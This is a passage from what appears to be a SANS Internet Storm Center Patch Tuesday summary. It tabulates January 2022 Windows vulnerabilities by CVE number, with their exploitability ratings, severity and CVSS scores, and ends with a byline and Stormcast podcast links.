| Task Flow Data Engine Elevation of Privilege Vulnerability | CVE-2022-21861 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Tile Data Repository Elevation of Privilege Vulnerability | CVE-2022-21873 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Virtual Machine IDE Drive Elevation of Privilege Vulnerability | CVE-2022-21833 | No | No | Less Likely | Less Likely | Critical | 7.8 | 6.8 |
| Win32k Elevation of Privilege Vulnerability | CVE-2022-21882 | No | No | More Likely | More Likely | Important | 7.0 | 6.1 |
| Win32k Elevation of Privilege Vulnerability | CVE-2022-21887 | No | No | More Likely | More Likely | Important | 7.0 | 6.1 |
| Win32k Information Disclosure Vulnerability | CVE-2022-21876 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8 |
| Windows Accounts Control Elevation of Privilege Vulnerability | CVE-2022-21859 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Windows AppContracts API Server Elevation of Privilege Vulnerability | CVE-2022-21860 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Windows Application Model Core API Elevation of Privilege Vulnerability | CVE-2022-21862 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Windows BackupKey Remote Protocol Security Feature Bypass Vulnerability | CVE-2022-21925 | No | No | Less Likely | Less Likely | Important | 5.3 | 4.8 |
| Windows Bind Filter Driver Elevation of Privilege Vulnerability | CVE-2022-21858 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8 |
| Windows Certificate Spoofing Vulnerability | CVE-2022-21836 | Yes | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Windows Cleanup Manager Elevation of Privilege Vulnerability | CVE-2022-21838 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8 |
| Windows Common Log File System Driver Elevation of Privilege Vulnerability | CVE-2022-21916 | No | No | More Likely | More Likely | Important | 7.8 | 6.8 |
| Windows Common Log File System Driver Elevation of Privilege Vulnerability | CVE-2022-21897 | No | No | More Likely | More Likely | Important | 7.8 | 6.8 |
| Windows DWM Core Library Elevation of Privilege Vulnerability | CVE-2022-21852 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8 |
| Windows DWM Core Library Elevation of Privilege Vulnerability | CVE-2022-21902 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8 |
| Windows DWM Core Library Elevation of Privilege Vulnerability | CVE-2022-21896 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Windows Defender Application Control Security Feature Bypass Vulnerability | CVE-2022-21906 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8 |
| Windows Defender Credential Guard Security Feature Bypass Vulnerability | CVE-2022-21921 | No | No | Less Likely | Less Likely | Important | 4.4 | 3.9 |
| Windows Devices Human Interface Elevation of Privilege Vulnerability | CVE-2022-21868 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability | CVE-2022-21839 | Yes | No | Less Likely | Less Likely | Important | 6.1 | 5.5 |
| Windows Event Tracing Elevation of Privilege Vulnerability | CVE-2022-21872 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | CVE-2022-21899 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8 |
| Windows GDI Elevation of Privilege Vulnerability | CVE-2022-21903 | No | No | More Likely | More Likely | Important | 7.0 | 6.1 |
| Windows GDI Information Disclosure Vulnerability | CVE-2022-21904 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5 |
| Windows GDI+ Information Disclosure Vulnerability | CVE-2022-21915 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.7 |
| Windows GDI+ Information Disclosure Vulnerability | CVE-2022-21880 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5 |
| Windows Geolocation Service Remote Code Execution Vulnerability | CVE-2022-21878 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8 |
| Windows Hyper-V Denial of Service Vulnerability | CVE-2022-21847 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.7 |
| Windows Hyper-V Elevation of Privilege Vulnerability | CVE-2022-21901 | No | No | Less Likely | Less Likely | Important | 9.0 | 7.8 |
| Windows Hyper-V Security Feature Bypass Vulnerability | CVE-2022-21900 | No | No | Less Likely | Less Likely | Important | 4.6 | 4.0 |
| Windows Hyper-V Security Feature Bypass Vulnerability | CVE-2022-21905 | No | No | Less Likely | Less Likely | Important | 4.6 | 4.0 |
| Windows IKE Extension Denial of Service Vulnerability | CVE-2022-21843 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5 |
| Windows IKE Extension Denial of Service Vulnerability | CVE-2022-21883 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5 |
| Windows IKE Extension Denial of Service Vulnerability | CVE-2022-21848 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5 |
| Windows IKE Extension Denial of Service Vulnerability | CVE-2022-21889 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.5 |
| Windows IKE Extension Denial of Service Vulnerability | CVE-2022-21890 | No | No | Less Likely | Less Likely | Important | 7.5 | 6.7 |
| Windows IKE Extension Remote Code Execution Vulnerability | CVE-2022-21849 | No | No | Less Likely | Less Likely | Important | 9.8 | 8.5 |
| Windows Installer Elevation of Privilege Vulnerability | CVE-2022-21908 | No | No | More Likely | More Likely | Important | 7.8 | 6.8 |
| Windows Kerberos Elevation of Privilege Vulnerability | CVE-2022-21920 | No | No | Less Likely | Less Likely | Important | 8.8 | 7.7 |
| Windows Kernel Elevation of Privilege Vulnerability | CVE-2022-21879 | No | No | Less Likely | Less Likely | Important | 5.5 | 4.8 |
| Windows Kernel Elevation of Privilege Vulnerability | CVE-2022-21881 | No | No | More Likely | More Likely | Important | 7.0 | 6.1 |
| Windows Modern Execution Server Remote Code Execution Vulnerability | CVE-2022-21888 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8 |
| Windows Push Notifications Apps Elevation Of Privilege Vulnerability | CVE-2022-21867 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | CVE-2022-21885 | No | No | More Likely | More Likely | Important | 7.8 | 6.8 |
| Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | CVE-2022-21914 | No | No | More Likely | More Likely | Important | 7.8 | 6.8 |
| Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | CVE-2022-21892 | No | No | Less Likely | Less Likely | Important | 6.8 | 6.1 |
| Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | CVE-2022-21958 | No | No | Less Likely | Less Likely | Important | 6.8 | 6.1 |
| Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | CVE-2022-21959 | No | No | Less Likely | Less Likely | Important | 6.8 | 6.1 |
| Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | CVE-2022-21960 | No | No | Less Likely | Less Likely | Important | 6.8 | 6.1 |
| Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | CVE-2022-21961 | No | No | Less Likely | Less Likely | Important | 6.8 | 6.1 |
| Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | CVE-2022-21962 | No | No | Less Likely | Less Likely | Important | 6.8 | 6.1 |
| Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | CVE-2022-21963 | No | No | Less Likely | Less Likely | Important | 6.4 | 5.6 |
| Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | CVE-2022-21928 | No | No | Less Likely | Less Likely | Important | 6.3 | 5.7 |
| Windows Security Center API Remote Code Execution Vulnerability | CVE-2022-21874 | Yes | No | Less Likely | Less Likely | Important | 7.8 | 6.8 |
| Windows StateRepository API Server file Elevation of Privilege Vulnerability | CVE-2022-21863 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Windows Storage Elevation of Privilege Vulnerability | CVE-2022-21875 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Windows System Launcher Elevation of Privilege Vulnerability | CVE-2022-21866 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Windows UI Immersive Server API Elevation of Privilege Vulnerability | CVE-2022-21864 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Windows User Profile Service Elevation of Privilege Vulnerability | CVE-2022-21919 | Yes | No | More Likely | More Likely | Important | 7.0 | 6.3 |
| Windows User Profile Service Elevation of Privilege Vulnerability | CVE-2022-21895 | No | No | Less Likely | Less Likely | Important | 7.8 | 6.8 |
| Windows User-mode Driver Framework Reflector Driver Elevation of Privilege Vulnerability | CVE-2022-21834 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.1 |
| Workstation Service Remote Protocol Security Feature Bypass Vulnerability | CVE-2022-21924 | No | No | Less Likely | Less Likely | Important | 5.3 | 4.8 |

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

January 11, 2022

ISC Stormcast For Tuesday, January 11th, 2022 https://isc.sans.edu/podcastdetail.html?id=7830, (Tue, Jan 11th)

January 10, 2022

ISC Stormcast For Monday, January 10th, 2022 https://isc.sans.edu/podcastdetail.html?id=7828, (Mon, Jan 10th)
